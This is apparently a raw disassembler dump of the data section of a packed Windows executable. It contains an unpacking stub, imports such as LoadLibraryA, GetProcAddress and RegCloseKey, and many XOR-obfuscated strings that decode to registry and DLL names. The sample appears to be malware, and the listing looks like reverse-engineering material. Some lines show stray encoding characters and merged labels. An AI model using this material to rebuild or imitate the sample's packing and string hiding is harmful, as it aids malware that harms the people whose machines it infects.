dd 7495517Ch, 64B5DBC1h, 76AD5567h, 5B22DC11h, 74E2DAA9h
dd 27158B50h, 0A870DDCCh, 7542BDFEh, 0C819D466h, 2CE42581h
dd 49602933h, 725F4B0Eh, 0EA8D0C45h, 7241006Dh, 85C5BD63h
dd 0A3D6DAF6h, 33226EBAh
dd 2AAB36EFh, 0AE69B7BCh, 33011F00h, 6C3DE4A0h, 36E55ACFh
dd 6F427441h, 92B72625h, 9599802Dh, 0DD662B2Bh, 5665488Dh
dd 6D3C7970h, 87642215h, 751D1415h, 1F491AF9h, 532E0D89h
dd 0C8A15359h, 1D5F14Ah, 17B61889h, 0E690072Dh, 4193001h
dd 0B2C95B48h, 4C04F14h, 0C0D74313h, 9D56B453h, 0ED45055Fh
dd 40D034CDh, 0B34FAB53h, 788B055Fh, 0B46B9FEh, 0EF04BD4Fh
dd 0C36D03FEh, 5D452B26h, 0EF473F07h, 17210B4h, 73316319h
dd 4F6C341Dh, 35697B74h, 9B074D67h, 6C61AE83h, 660D490Dh
dd 0BC40232Bh, 0B93BAEB1h, 7390334h, 0D064C762h, 1E751D75h
dd 6D234317h, 0D14B073h, 812073C8h, 18C18861h, 0AF6B6174h
dd 4D339B20h, 7D13DF7h, 206F1163h, 0C43D9279h, 7CF76E0h
dd 0CC15314h, 533DF6DCh, 5DF34F79h, 0CF9DD637h, 2D4B3354h
dd 0D6C056Eh, 0BAE06652h, 7531C307h, 1D8DCF13h, 15119EE6h
dd 1544CB47h, 0D7449463h, 7970698Dh, 1F6E2D69h, 0B6F7595Bh
dd 21516849h, 5539965h, 36B90189h, 81560B00h, 971C2B58h
dd 85EF324Bh, 0D8F30705h, 373135C8h, 4F07002Eh, 0B06665C4h
dd 0D561B774h, 0B6EBAF6Eh, 2971E790h, 671B4C2Fh, 0EB1B8429h
dd 79930D0Eh, 21A3678Dh, 0D9ECAE10h, 61B2013h, 0A9BA1AEBh
dd 30BF3215h, 33092D05h, 8ACEC262h, 54770C9Bh, 0C62F0D30h
dd 0C751646Dh, 8F742672h, 29576FB3h, 830B6B7Dh, 0D5CC348Dh
dd 934F3E1Fh, 126C0969h, 6E2FE766h, 0C1A461EFh, 79072EBAh
dd 500D2057h, 0C6E7C775h, 42576106h, 6F643FB9h, 48BEE8C4h
dd 0F6F1F5Ch, 0A2EF4375h, 7745258Ch, 2308BB3Ah, 0E15B6421h
dd 0CEE7DEDFh, 7553B746h, 0D2F5695Fh, 0B7C26C61h, 43561F44h
dd 0E887095Dh, 84240056h, 0E8C27A6Dh, 1F7315B6h, 409A361h
dd 90337FB0h, 0A80315CDh, 34C43380h, 5BDF34D0h, 34FFFFD5h
dd 350F34EEh, 352A351Bh, 35A63539h, 35D735D1h, 0FA32A7E0h
dd 36FF556Fh, 368A366Bh, 99A4369Bh, 378A3710h, 3846381Ch
dd 17FFFFFFh, 0C3385F3Ah, 0FE38E238h, 38392838h, 4B394539h
dd 0B6396539h, 0E639D339h, 0FF39F939h, 39FFFFFFh, 473A403Ah
dd 553A4E3Ah, 633A5C3Ah, 713A6A3Ah, 903A783Ah, 0A83A9F3Ah
dd 0F43AB13Ah, 0FF3B083Ah, 10FFFFFFh, 763B153Bh, 0C3B7E3Bh
dd 8C3C723Ch, 93C9F3Ch, 0B03D313Dh, 3A3DB93Dh, 973E803Eh
dd 8B3E9E3Eh, 0BEFFFFAFh, 353F043Eh, 623F4C3Fh, 7D3F6E3Fh
dd 0F93FF03Fh, 0F27B1084h, 0C066FFFFh, 31053020h, 312A3111h
dd 316C3139h, 31893178h, 320C3198h, 0FFFFC002h, 332B3323h
dd 33C23344h, 340B33E3h, 34183413h, 0DDFF8F29h, 3458FFFFh
dd 34F334C1h, 352134FBh, 352E3529h, 0CB893581h, 35F335E5h
dd 361635FDh, 0F77F4623h, 363036FFh, 36413639h, 367C3658h
dd 36BADB82h, 384E36DDh, 0FFFF0E53h, 7D38FFFFh, 0B1389038h
dd 0B1393E38h, 223A1739h, 683A5E3Ah, 0E83AC63Ah, 283B1D3Ah
dd 853B7C3Bh, 0FBBFB73Bh, 73BFEFFh, 703C683Ch, 803C763Ch
dd 0E7B9883Ch, 5D3D503Ch, 3E2E343Dh, 0FFFFFE45h, 3E4A3EFFh
dd 3E573E50h, 3E783E6Eh, 3EDE3ECDh, 3F6C3F61h, 3F933F85h
dd 3FCA3FBFh, 3FE93FDBh, 1EEFFFFFh, 4CBFF4E8h, 0D9308930h
dd 0F630DE30h, 3A30FD30h, 5B314131h, 10316431h, 94FFF42Fh
dd 0A8319F31h, 0F231AD31h, 3F31F831h, 1B163235h, 9E1ADFFEh
dd 0BA34AAC3h, 0D734CB34h, 20350834h, 80356E8Dh, 86FE0037h
dd 0A535A035h, 48277835h, 0F0007637h, 0E0F0DEDh, 38A72C38h
dd 0FF683850h, 51BFFFB7h, 391438CBh, 39203919h, 392C3926h
dd 61003934h, 85397639h, 9F398D39h, 0B001B39h, 0AC39A7EEh
dd 17D099CBh, 5BFE00EDh, 39F539FDh, 4BFF39FAh, 183A103Ah
dd 743A1E3Ah, 37FFFFFFh, 423AB319h, 813B733Bh, 0AE3BA83Bh
dd 0BA3BB43Bh, 0C63BC03Bh, 0D23BCC3Bh, 0FF3BD83Bh, 0DEFFFD2Fh
dd 0EA3BE43Bh, 0A23BF03Bh, 0F33DEE3Dh, 3E0FA03Dh, 3E213E14h
dd 3E353E30h, 0FFC00642h, 3E513EFFh, 3E603E56h, 3E813E72h
dd 3E903E89h, 2B473F3Dh, 0F001BFC0h, 29913F83h, 3FBC3FA6h
dd 0FFD53FC4h, 2D06DB19h, 0DF30F3F3h, 301A3015h, 2424301Fh
dd 30EDB7F8h, 35003029h, 303F30F5h, 306A3065h, 9EC7E61Fh
dd 31424E00h, 60199749h, 0A2FA0640h, 73458D01h, 0FE73F844h
dd 6802EC49h, 20FB6B70h, 5C302E32h, 9E268B4Bh, 775C1780h
dd 20F4F05Ch, 70550501h, 0C4B16264h, 4EA70495h, 3BFE77AAh
dd 95A6AD4h, 74536B42h, 30747261h, 476F9C05h, 70756F72h
dd 41780AD6h, 0C11FAC0Ah, 34740582h, 167618D7h, 5C764350h
dd 5B6E73D5h, 0D0120h, 0ED709FD7h, 977EDE01h, 0BA1D6Fh
dd 3E08F61Dh, 5D155C90h, 40323C57h, 59066046h, 1F4523FBh
dd 3380082Ah, 7EFF85F6h, 197F1817h, 285C6615h, 0F73B461Eh
dd 0AA4237Ch, 2480E9F3h, 62FEE03Bh, 101CF243h, 13180040h
dd 7654680Ch, 0C6C9BE61h, 6A111473h, 3E48100Eh, 28E05481h
dd 0A9004010h, 48EE74C2h, 0E04C1B14h, 60A306E7h, 0F54C656h
dd 0F736A309h, 549105Ah, 4F400420h, 0FB64059Ch, 34593167h
dd 9C64BD20h, 57F6C94Ch, 0A49C9CBEh, 81CF25C6h, 0D068C0A4h
dd 0D8799FF7h, 3A681600h, 0A6ABB68h, 482394BEh, 597FDDF3h
dd 0F3AC7D8Dh, 84BEA4A5h, 0D87D8D0Bh, 9E7CA5A5h, 0F0C11BB1h
dd 0A74BEF5h, 0EBB76CE8h, 0A5F84776h, 0B6468E4h, 0BEACE6A4h
dd 3E205D99h, 69248055h, 16A7BC1h, 0EC7457B0h, 196A0F14h
dd 0E2350F35h, 1FF89B09h, 0C94CC483h, 9CCD9261h, 0F8DF08E1h
dd 0D437F56Ah, 544A66Ch, 80D4A940h, 6173850Fh, 0BCBE9DF7h
dd 0F26604EFh, 0BAFF0096h, 64420EF7h, 0EC358B0Ch, 67F4FE14h
dd 0D6463067h, 8319031Ah, 0EEBF7847h, 305204C2h, 5842A3Ch
dd 59010E11h, 67D98B61h, 0EC68591Eh, 342A2039h, 0F3C86801h
dd 7210FF00h, 0DE1A7CADh, 60385A13h, 0C3640AEAh, 0E0349F74h
dd 0AFD40476h, 0EF112E30h, 47B2CEFh, 68D68D8Dh, 2898D0FFh
dd 0EFBF0A56h, 51204D1Dh, 0B55FBB6Ch, 968B5900h, 2A3635C0h
dd 4876A796h, 950DD14h, 1E04B657h, 7D8DEA2Dh, 0EFF3302h
dd 5420F908h, 5DB023B4h, 0B01D2457h, 5735957h, 0CC5102h
dd 28601600h, 101B70A0h, 61019C41h, 618013Ch, 15C21C4h
dd 0C0310044h, 0ABA4280h, 3E9384BAh, 400F977h, 92203031h
dd 908824A6h, 4015557h, 0B203188h, 90E29201h, 0D4010E20h
dd 0C4065601h, 904C04B2h, 3EE60620h, 12F1256Dh, 16884412h
dd 5CD83041h, 7B7DE3D2h, 56460AB2h, 80B66744h, 36851055h
dd 0C443EC8Ah, 1315C69h, 5F200673h, 10C5416h, 2F20F200h
dd 10F79E1h, 78D5656Eh, 0C122A0B0h, 810CE280h, 1F8DF505h
dd 54840C02h, 7A744EE0h, 1957AC83h, 4681704h, 5F505996h
dd 0EB906CB0h, 6C510C02h, 2CFD4820h, 7Bh, 71BFBCh, 120000h
dd 6000FF00h, 406000BEh, 0BE8D00h, 57FFFFB0h, 0EBFFCD83h
dd 90909010h, 8A909090h, 7884606h, 75DB0147h, 831E8B07h
dd 0DB11FCEEh, 1B8ED72h, 1000000h, 8B0775DBh, 0FCEE831Eh
dd 0C011DB11h, 0EF73DB01h, 1E8B0975h, 11FCEE83h, 31E473DBh
dd 3E883C9h, 0E0C10D72h, 46068A08h, 74FFF083h, 1C58974h
dd 8B0775DBh, 0FCEE831Eh, 0C911DB11h, 775DB01h, 0EE831E8Bh
dd 11DB11FCh, 412075C9h, 775DB01h, 0EE831E8Bh, 11DB11FCh
dd 73DB01C9h
dd 8B0975EFh, 0FCEE831Eh, 0E473DB11h, 8102C183h, 0FFF300FDh
dd 1D183FFh, 832F148Dh, 0F76FCFDh, 8842028Ah, 75494707h
dd 0FF63E9F7h, 8B90FFFFh, 4C28302h, 0C7830789h, 4E98304h
dd 0CF01F177h, 0FFFF4CE9h, 0F7895EFFh, 11AB9h, 47078A00h
dd 13CE82Ch, 3F80F777h, 8BF27504h, 45F8A07h, 8E8C166h
dd 8610C0C1h, 80F829C4h, 0F001E8EBh, 0C7830789h, 0E2D88905h
dd 0BE8DD9h, 8B000070h, 74C00907h, 45F8B3Ch, 30848Dh, 1000090h
dd 0C78350F3h, 5096FF08h, 95000090h, 847078Ah, 89DC74C0h
dd 0F24857F9h, 96FF55AEh, 9054h, 774C009h, 0C3830389h
dd 0FFE1EB04h, 905896h, 61E96100h, 0FFFFDFh, 25h dup(0)
dd 70000000h, 500000A0h, 0A0h, 2 dup(0)
dd 7D000000h, 600000A0h, 0A0h, 2 dup(0)
dd 8A000000h, 680000A0h, 0A0h, 4 dup(0)
dd 94000000h, 0A20000A0h, 0B20000A0h, 0A0h, 0C0000000h
dd 0A0h, 0CE000000h, 0A0h, 4B000000h, 454E5245h, 2E32334Ch
dd 4C4C44h, 41564441h, 32334950h, 6C6C642Eh, 56534D00h
dd 2E545243h, 6C6C64h, 616F4C00h, 62694C64h, 79726172h
dd 47000041h, 72507465h, 6441636Fh, 73657264h, 45000073h
dd 50746978h, 65636F72h, 7373h, 67655200h, 736F6C43h, 79654B65h
dd 72000000h, 646E61h, 4Bh dup(0)
dd 5, 0Eh
dword_446478 dd 4Fh ; sub_4083D0:loc_4083FF�r ...
byte_44647C db 6Bh, 48h, 0 ; DATA XREF: sub_408472+17�o
word_44647F dw 42h ; DATA XREF: sub_408472+24�r
aAluvia_0 db 'LUVIa',0 ; DATA XREF: sub_408472+B1�o
byte_446488 db 0 ; DATA XREF: sub_408581+12�o
aCBoot_sys db 'c:\boot.sys',0 ; DATA XREF: sub_408581+38�o
aZh db ':zH=',0 ; DATA XREF: sub_408581+4B�o
a0vmI db '0Vm |I',0 ; DATA XREF: sub_408581+7B�o
byte_4464A1 db 3 dup(0) ; DATA XREF: sub_408581+B8�o
dword_4464A4 dd 11h, 0Fh dup(0)dword_4464E4 dd 0E1F7EEA5h, 0BFFD7E2Ch, 869AE87Fh, 0CC244082h, 0D76ADDE2h
; DATA XREF: sub_408860+8�o
dd 1B77E1E1h, 505215B0h, 0D24B6456h, 3D357C6Bh, 280E85D5h
dd 1AB051F9h, 1E4E8744h, 0E383CCDFh, 323D4737h, 14F80518h
dd 6E0637BFh, 2, 0Fh
dword_44652C dd 0 ; .text:loc_4086F0�r ...
dd 6
dword_446534 dd 0Bh dword_446538 dd 0 ; .text:loc_4087F0�r ...
aFf3?B db 'Ff3? b',0 ; DATA XREF: sub_408884+14�o
a_lpbl db '.LpBL',0 ; DATA XREF: sub_408884+24�o
aHCwul db 'H,CwUL',0 ; DATA XREF: sub_408884+A3�o
dword_446550 dd 0 dd 8, 0Eh
dword_44655C dd 0 ; .text:loc_4089F9�r ...
dword_446560 dd 0FFFFFFFFh dd 2Ah dup(0FFFFFFFFh), 3Eh, 3 dup(0FFFFFFFFh), 3Fh, 34h
dd 35h, 36h, 37h, 38h, 39h, 3Ah, 3Bh, 3Ch, 3Dh, 7 dup(0FFFFFFFFh)
dd 0
dd 1, 2, 3, 4, 5, 6, 7, 8, 9, 0Ah, 0Bh, 0Ch, 0Dh, 0Eh
dd 0Fh, 10h, 11h, 12h, 13h, 14h, 15h, 16h, 17h, 18h, 19h
dd 6 dup(0FFFFFFFFh), 1Ah, 1Bh, 1Ch, 1Dh, 1Eh, 1Fh, 20h
dd 21h, 22h, 23h, 24h, 25h, 26h, 27h, 28h, 29h, 2Ah, 2Bh
dd 2Ch, 2Dh, 2Eh, 2Fh, 30h, 31h, 32h, 33h, 85h dup(0FFFFFFFFh)
a4Zqk? db '4<Zqk?',0 ; DATA XREF: sub_408A4F+42�o
word_446967 dw 35h ; DATA XREF: sub_408A4F+14D�r
align 4
off_44696C dd offset loc_408AE1 ; DATA XREF: sub_408A4F+86�r
dd offset loc_408AEB
dd offset loc_408B16
dd offset loc_408B44
dd 2, 0Bh
dword_446984 dd 0 ; sub_408BAE:loc_408BE4�r ...
byte_446988 db 0 ; DATA XREF: sub_408C55+26�o
byte_446989 db 0 ; DATA XREF: sub_408C55+A2�o
aHt@zso db 'Ht@zSo',0 ; DATA XREF: sub_408C55+F0�o
a7r db '7R ',0 ; DATA XREF: sub_408C55+13C�o
aG db ' ',0 ; DATA XREF: sub_408C55+19B�o
aQy3 db 'qY3 `',0 ; DATA XREF: sub_408E57+3E�o
dword_44699F dd 482633h word_4469A3 dw 27h ; DATA XREF: sub_408EFF+12F�r
word_4469A5 dw 27h ; DATA XREF: sub_408EFF+254�r
word_4469A7 dw 49h ; DATA XREF: sub_408EFF+2DB�r
aKgH db 'KG H^',0 ; DATA XREF: sub_408EFF+3F1�o
byte_4469AF db 0 ; DATA XREF: sub_408EFF+478�o
aZ_0 db 'z ',0 ; DATA XREF: sub_408EFF+5EE�o
byte_4469B3 db 0 ; DATA XREF: sub_408EFF+79C�o
word_4469B4 dw 3Dh ; DATA XREF: sub_408EFF+7DD�r
aWvqrQ db 'WVqr^:Q',0 ; DATA XREF: sub_408EFF+93C�o
aO8_ db 'O 8.',0 ; DATA XREF: sub_409883+1B�o
byte_4469C3 db 0 ; DATA XREF: sub_409883+2E�o
aOacPl db 'oac-Pl',0 ; DATA XREF: sub_409883+3F�o
word_4469CB dw 4Fh ; DATA XREF: sub_409883+4C�r
aW9 db ' +W9',0 ; DATA XREF: sub_409883+5F�o
byte_4469D2 db 0 ; DATA XREF: sub_409883+1B8�o
aZis8 db ' ZIs8',0 ; DATA XREF: sub_409883+1FB�o
aKa db 'KA',0 ; DATA XREF: sub_409883+269�o
aVHE db '~H:!e',0 ; DATA XREF: sub_409883+357�o
word_4469E3 dw 36h ; DATA XREF: sub_409883+46B�r
aQ1Q5k db 'Q1^Q!5k',0 ; DATA XREF: sub_409883+496�o
a1g db '1G',0 ; DATA XREF: sub_409883+59E�o
aKdb db ',kd',0 ; DATA XREF: sub_409883+5FB�o
aZn7? db 'zN7?>',0 ; DATA XREF: sub_409883+6E1�o
byte_4469FB db 0 ; DATA XREF: sub_409883+73E�o
a8a5 db '`<$8a5!',0 ; DATA XREF: sub_409883+995�o
aXern db '<xerN ',0 ; DATA XREF: sub_409883+9D1�o
a9aZ59 db '9A |Z59',0 ; DATA XREF: sub_409883+A45�o
a?0n db '?>%0N',0 ; DATA XREF: sub_409883+B3F�o
word_446A19 dw 3Ah ; DATA XREF: sub_409883+BC9�r
byte_446A1B db 4Dh ; DATA XREF: sub_409883+BDC�o
dd 80575043h
db 7Fh, 72h, 0
aVchcV db '|Vchc$V',0 ; DATA XREF: sub_409883+C31�o
aWc db ' Wc',0 ; DATA XREF: sub_409883+D3E�o
aJ_0 db 'J-',0 ; DATA XREF: sub_40A6EA+B�o
aXu1gH db 'XU&1G',27h,'H',0 ; DATA XREF: sub_40A74E+1C�o
word_446A3B dw 20h ; DATA XREF: sub_40A74E+109�r
aYHny db 'y~^HNY',0 ; DATA XREF: sub_40A74E+1B4�o
aV6ta db 'V6ta',0 ; DATA XREF: sub_40A74E+1C7�o
byte_446A49 db 0 ; DATA XREF: sub_40A74E+1DA�o
byte_446A4A db 0 ; DATA XREF: sub_40A74E+26F�o
word_446A4B dw 34h ; DATA XREF: sub_40A74E+2A4�r
dword_446A4D dd 806E55h aMZ db 'M/#Z',0 ; DATA XREF: sub_40A74E+43C�o
a4nvc db '4NC',0 ; DATA XREF: sub_40A74E+594�o
word_446A5B dw 30h ; DATA XREF: sub_40A74E:loc_40ACEF�r
aWwwl4u db 'Wwwl4u',0 ; DATA XREF: sub_40A74E+615�o
dword_446A64 dd 4D556Ch aYiso db '`YIsO',0 ; DATA XREF: sub_40A74E+6D5�o
aN@bln5p db 'N@bLn5P',0 ; DATA XREF: sub_40A74E+747�o
word_446A76 dw 6634h ; DATA XREF: sub_40A74E+75F�o
dd 20817Fh
aO3@ db ' $o~3@',0 ; DATA XREF: sub_40A74E+7F4�o
byte_446A83 db 0 ; DATA XREF: sub_40AF80+F�o
aR3lf9 db '$R3LF9-',0 ; DATA XREF: sub_40AF80+AC�o
aGra db '#GRA',0 ; DATA XREF: sub_40B090+F�o
dword_446A91 dd 50684Bh word_446A95 dw 7Eh ; DATA XREF: sub_40B090+22D�r
byte_446A97 db 0 ; DATA XREF: sub_40B090+256�o
dword_446A98 dd 207583h dword_446A9C dd 623551h byte_446AA0 db 0 ; DATA XREF: sub_40B090+495�o
word_446AA1 dw 5Fh ; DATA XREF: sub_40B090+4E3�r
dword_446AA3 dd 376C3Eh byte_446AA7 db 0 ; DATA XREF: sub_40B090+741�o
byte_446AA8 db 48h, 57h, 0 ; DATA XREF: sub_40B090+810�o
dword_446AAB dd 685980h align 10h
byte_446AB0 db 5, 0 ; DATA XREF: sub_40B090+8A3�o
word_446AB2 dw 0F08h ; DATA XREF: sub_40B090+7CE�o
db 0
byte_446AB5 db 50h, 6Bh, 64h ; DATA XREF: sub_40B090+6DE�o
dd 25606967h, 64256A71h, 6A6D7170h, 607F6C77h
db 0
byte_446AC9 db 50h, 6Bh, 64h ; DATA XREF: sub_40B090+6CC�o
dd 25606967h, 64256A71h, 6A6D7170h, 607F6C77h, 4C252825h
dd 574A464Bh, 51464057h, 4B4C5525h, 6955252Bh, 60766460h
dd 6A662529h, 66607777h
db 71h, 2Bh, 0
aVV_0 db ' v( v',0 ; DATA XREF: sub_40B090+4F7�o
aUiDvVIFq@Ulw_0 db 'Ui`dv`)%v`i`fq%@}ulwdqljk%\`dw',0 ; DATA XREF: sub_40B090+4A2�o
aVV db ' v% v',0 ; DATA XREF: sub_40B090+425�o
; sub_40B090+713�o
aUiDvVIFq@Ulwdq db 'Ui`dv`)%v`i`fq%@}ulwdqljk%Hjkqm',0 ; DATA XREF: sub_40B090+3F5�o
aV db ' v',0 ; DATA XREF: sub_40B090+383�o
aFivlayVylkuwjf db 'FIVLAY vYLkUwjfV`ws`w67',0 ; DATA XREF: sub_40A74E+6E5�o
aS_0 db 'S',0 ; DATA XREF: sub_40A74E+6AD�o
aN_1 db 'N',0 ; DATA XREF: sub_40A74E+68F�o
aVjcqrdwYhlfw_0 db 'Vjcqrdw`YHlfwjvjcqYRlkajrvYFpww`kqS`wvljkYVm`iiV`wslf`Jgo`fqA`id|'
; DATA XREF: sub_40A74E+65C�o
db 'Ijda',0
aWBlvqWvWslfUwj db 'W`blvq`wV`wslf`Uwjf`vv',0 ; DATA XREF: sub_40A74E+542�o
aNWkI67Aii db 'n`wk`i67+aii',0 ; DATA XREF: sub_40A74E+52E�o
aYgjjqVV db 'Ygjjq+v|v',0 ; DATA XREF: sub_40A74E+3EE�o
aDatkkq32_dll db 'datkkq32.dll',0 ; DATA XREF: sub_40A74E+3B6�o
aDnkkq_dll db 'dnkkq.dll',0 ; DATA XREF: sub_40A74E+378�o
aKkq32_dll db 'kkq32.dll',0 ; DATA XREF: sub_40A74E+33A�o
aVyV_0 db ' vY v',0 ; DATA XREF: sub_40A74E+330�o
; sub_40A74E+36E�o ...
aVyV db ' vY v+`}`',0 ; DATA XREF: sub_40A74E+284�o
aKdgiAvc db '`kdgi`avc',0 ; DATA XREF: sub_40A74E+AA�o
aYawlsWvykalvwa db 'Yawls`wvYkalvwa+v|v',0 ; DATA XREF: sub_40A74E+37�o
dd 2 dup(0)
dbl_446C34 dq 1.2 ; DATA XREF: sub_409883+D6A�r
aKRsW db 'k`rs`w',0 ; DATA XREF: sub_409883+CC5�o
aA7 db '}a7',0 ; DATA XREF: sub_409883+C53�o
aRpua db 'rpua%',0 ; DATA XREF: sub_409883+B9B�o
aVFV db ' v%*F% v',0 ; DATA XREF: sub_409883+B5B�o
aYfjhhdkaFjh db 'Yfjhhdka+fjh',0 ; DATA XREF: sub_409883+B1F�o
aVyfjhhdkaUlc db ' vYfjhhdka+ulc',0 ; DATA XREF: sub_409883+AE2�o
aYfha db 'Yfha+`}`',0 ; DATA XREF: sub_409883+A8E�o
aVyfhaUlc db ' vYfha+ulc',0 ; DATA XREF: sub_409883+A6E�o
a?57p db '? 57p',0 ; DATA XREF: sub_409883+9E7�o
aAhu87 db ':ahu87',0 ; DATA XREF: sub_409883+866�o
aVyVQhu db ' vY v+qhu',0 ; DATA XREF: sub_409883+709�o
aRuvq db 'ruvq%',0 ; DATA XREF: sub_409883+434�o
aT db 't',0 ; DATA XREF: sub_409883+20B�o
; sub_409883+53F�o ...
aLcf8P db ':lcf8 p',0 ; DATA XREF: sub_409883+1C5�o
aLcf db 'lcf',0 ; DATA XREF: sub_409883+181�o
; sub_409883+296�o
aVjcqrdwYhlfwjv db 'Vjcqrdw`YHlfwjvjcqYRlkajrv',0 ; DATA XREF: sub_409883+16F�o
; sub_409883+284�o
aRdfhUmu db '*rdfh+umu',0 ; DATA XREF: sub_409883+138�o
asc_446CD6 db '*',0 ; DATA XREF: sub_409883+103�o
aMqqu?V db 'mqqu?** v',0 ; DATA XREF: sub_409883+CF�o
aVyVAdq db ' vY v+adq',0 ; DATA XREF: sub_409883+99�o
; sub_409883+50F�o ...
aFilfnJkfQjFjkq db 'Filfn%Jkf`%Qj%Fjkqlkp`',0 ; DATA XREF: sub_408EFF+732�o
aGpqqjk db 'GPQQJK',0 ; DATA XREF: sub_408EFF+720�o
a@alq db '@ALQ',0 ; DATA XREF: sub_408EFF+645�o
; sub_408EFF+6A4�o
aUiDvHdnFjwwFql db 'Ui`dv`%hdn`%fjww`fqljkv%dka%qw|%dbdlk+',0 ; DATA XREF: sub_408EFF+582�o
word_446D36 dw 6B50h ; DATA XREF: sub_408EFF+50F�o
dd 60696764h, 256A7125h, 6D717064h, 7F6C776Ah, 44252B60h
dd 55254851h, 46284B4Ch, 2560616Ah, 7725766Ch, 6C707460h
dd 25616077h, 66256A71h, 6975686Ah, 25607160h, 25606D71h
dd 6B647771h, 71666476h, 2B6B6A6Ch
db 0
aDqhUlkFja db 'DQH%ULK(Fja`',0 ; DATA XREF: sub_408EFF+497�o
a@UlwdqljkAdq db '@}ulwdqljk%adq`',0 ; DATA XREF: sub_408EFF+413�o
aJpwFdwaKphgW db '\jpw%fdwa%kphg`w',0 ; DATA XREF: sub_408EFF+38F�o
a757p db '75 +7p',0 ; DATA XREF: sub_408EFF+321�o
a7p db ' +7p',0 ; DATA XREF: sub_408EFF+2EA�o
aFjhgjgj db 'FJHGJGJ]',0 ; DATA XREF: sub_408EFF+1F8�o
; sub_408EFF+263�o
dword_446DC4 dd 2525250Fh, 6D717044h, 7F6C776Ah, 6A6C7164h, 6443256Bh
; DATA XREF: sub_408EFF+CE�o
dd 6160696Ch
db 2Bh, 0
aVqdqlf db 'VQDQLF',0 ; DATA XREF: sub_408EFF+BC�o
; sub_408EFF+13E�o ...
aKkqhook db 'KKQHOOK',0 ; DATA XREF: sub_408EFF+A1�o
; sub_409883+221�o ...
align 2
a@UijwW db '@}uijw`w',0 ; DATA XREF: sub_408EFF+2F�o
; sub_40B090+CC�o
aAjfjgoFq db 'AjfJgo`fq',0 ; DATA XREF: sub_408EFF+13�o
; sub_40B090+9A�o
byte_446E01 db 78h, 6Dh, 41h ; DATA XREF: sub_408C55+C7�o
dd 4B48545Ch, 410A4156h, 4C04415Ch, 1E545050h, 4D520B0Bh
dd 4A480A50h, 45510Ah
aTepl db 'tEPL',0 ; DATA XREF: sub_408C55+54�o
byte_446E25 db 77h, 4Bh, 42h ; DATA XREF: sub_408C55+42�o
dd 56455350h, 4D697841h, 574B5647h, 7850424Bh, 7704616Dh
dd 54515041h, 50417778h
db 51h, 54h, 0
byte_446E47 db 0FEh ; DATA XREF: sub_408581+F6�o
dd 8CC6CFC1h, 82C7DAC7h, 0D182E18Dh, 0D6D0C3D6h, 0FE98C182h
dd 0D6CDCDC0h, 0D1DBD18Ch
db 0
byte_446E65 db 87h, 0D1h, 0FEh ; DATA XREF: sub_408581+D6�o
aM_2 db 'ƌ',0
dword_446E70 dd 0D0C7C9FEh, 91CEC7CCh, 0CEC68C90h db 0CEh, 0
word_446E7E dw 4F48h ; DATA XREF: sub_40815F+227�o
db 0
byte_446E81 db 0AEh, 0E7h, 0EFh ; DATA XREF: sub_406D91+F85�o
dd 0E5ECE7EFh, 0F7E4E1AEh, 0E5F2E1h
aOcqqcXo db '',0 ; DATA XREF: sub_406D91+F58�o
aA db '',0 ; DATA XREF: sub_406D91+EDB�o
asc_446E9B db '',0 ; DATA XREF: sub_406D91+E65�o
aAe db 'غ',0 ; DATA XREF: sub_406D91+E09�o
aENEA db 'ߥحߥؾ',0 ; DATA XREF: sub_406D91+674�o
aNEA db 'ǭߥؾ',0 ; DATA XREF: sub_406D91+62A�o
aName: ; DATA XREF: sub_406D91+36�o
unicode 0, <name>,0
align 4
aValue: ; DATA XREF: sub_406D91+15�o
unicode 0, <value>,0
dword_446EE0 dd 37262C08h, 232A362Ah, 2B0C6531h, 2B372031h, 653120h
; DATA XREF: sub_406A35+AB�o
dd 2A29353Dh, 372037h
a9ba05972F6a811: ; DATA XREF: sub_406980+23�o
unicode 0, <{9BA05972-F6A8-11CF-A442-00A0C90A8F39}>,0
aHtml db '<HTML><!--',0 ; DATA XREF: sub_4062A9+478�o
; sub_4062A9+483�o ...
aXOkrecv11 db 'X-okRecv11',0 ; DATA XREF: sub_4062A9+3D1�o
dword_446F60 dd 1B2F2C20h, 0C0408hdword_446F68 dd 1C4C1A4Ch, 24494449h, 61B0A00h, 1D0F061Ah, 1D072049h
; DATA XREF: sub_4062A9+2E8�o
dd 0C071B0Ch, 112C491Dh, 1B060519h
db 0Ch, 1Bh, 0
byte_446F8B db 35h ; DATA XREF: sub_4062A9+1CD�o
dd 19110C20h, 0C1B0605h, 0C110C47h
db 49h, 0
word_446F9A dw 839h ; DATA XREF: sub_4062A9+A4�o
db 1Dh, 1, 0
byte_446F9F db 3Ah ; DATA XREF: sub_4062A9+92�o
dd 1E1D0F06h, 350C1B08h, 1B0A0024h, 0F061A06h, 2C20351Dh
dd 1D0C3A49h, 3A35191Ch, 191C1D0Ch
db 0
byte_446FC1 db 28h, 2 dup(19h) ; DATA XREF: sub_405F5E+315�o
dd 70C1F2Ch, 3A351A1Dh, 40C010Ah, 28351A0Ch, 351A1919h
dd 519112Ch, 1B0C1B06h, 1D0A2835h, 1D081F00h, 2D0E0700h
dd 41C0A06h, 351D070Ch, 1B1C2A47h, 1D070C1Bh
db 0
byte_446FFD db 28h, 2 dup(19h) ; DATA XREF: sub_405F5E+2E0�o
dd 70C1F2Ch, 3A351A1Dh, 40C010Ah, 28351A0Ch, 351A1919h
dd 519112Ch, 1B0C1B06h, 1F082735h, 1D080E00h, 350E0700h
dd 1B1C2A47h, 1D070C1Bh
db 0
byte_447031 db 2Eh, 5, 6 ; DATA XREF: sub_405F5E+2B7�o
dd 3C05080Bh, 261B0C1Ah, 50F0Fh
db 7, 0Ch, 0
byte_447043 db 3Ah ; DATA XREF: sub_405F5E+2A5�o
dd 1E1D0F06h, 350C1B08h, 1B0A0024h, 0F061A06h, 3E351Dh
dd 1E060D07h, 1C2A351Ah, 70C1B1Bh, 1B0C3F1Dh, 706001Ah
dd 1D072035h, 0C071B0Ch, 0C3A491Dh, 7001D1Dh
db 0Eh, 1Ah, 0
byte_44707F db 0 ; DATA XREF: sub_405F5E+274�o
dd 519110Ch, 470C1B06h, 0C110Ch
dword_44708C dd 3A351A4Ch, 1E1D0F06h, 350C1B08h, 1B0A0024h, 0F061A06h
; DATA XREF: sub_405F5E+23D�o
dd 720351Dh, 71B0C1Dh, 2C491D0Ch, 6051911h, 351B0C1Bh
dd 7000824h, 80C2F35h, 0C1B1C1Dh, 1D07062Ah, 3505061Bh
dd 3D282C2Fh, 362C3B3Ch, 282A2625h, 2A282425h, 2C272021h
dd 2A262536h, 3E262D22h
db 27h, 0
word_4470E6 dw 0C10h ; DATA XREF: sub_405F5E+1DB�o
db 1Ah, 0
